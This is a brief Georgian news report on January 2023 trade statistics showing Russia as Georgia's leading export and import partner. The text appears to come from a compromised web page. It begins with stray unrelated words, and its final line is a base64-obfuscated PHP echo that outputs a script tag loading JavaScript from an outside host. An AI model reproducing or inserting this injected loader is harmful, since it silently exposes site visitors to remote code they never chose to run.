celsiusi
ავერსი საქკაბელი

2023 წლის იანვრის მონაცემებით, რუსეთი საქართველოს ნომერ პირველი სავაჭრო პარტნიორი გახდა. აღნიშნულს მოწმობს სტატისტიკის ეროვნული სამსახურის მიერ გამოქვეყნებული მონაცემები. რუსეთი ქვეყნის მთავარი სავაჭრო პარტნიორია, როგორც ექსპორტის, ისე იმპორტის თვალსაზრისით.

კერძოდ, საქსტატის მონაცემებით, 2023 წლის იანვარში გასული წლის ანალოგიურ პერიოდთან შედარებით, საქართველოდან რუსეთში ექსპორტი 105.7%-ით, ხოლო იქიდან იმპორტი 104.5%-ით არის გაზრდილი.

სტატისტიკის ეროვნული სამსახურის მიერ გამოქვეყნებული წინასწარი შედეგების თანახმად, იანვარში რუსეთში 87 785 800 აშშ დოლარის ექსპორტი განხორციელდა, მაშინ როცა 2022 წლის იანვარში ეს მაჩვენებელი 42 684 000 აშშ დოლარი იყო. რაც შეეხება იმპორტს, მიმდინარე წლის 1-ელ თვეში რუსეთიდან საქართველოში 175 793 200 აშშ დოლარის იმპორტი განხორციელდა, მაშინ როცა 1 წლის წინანდელი მაჩვენებელი 85 948 100 აშშ დოლარს შეადგენდა.

356
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");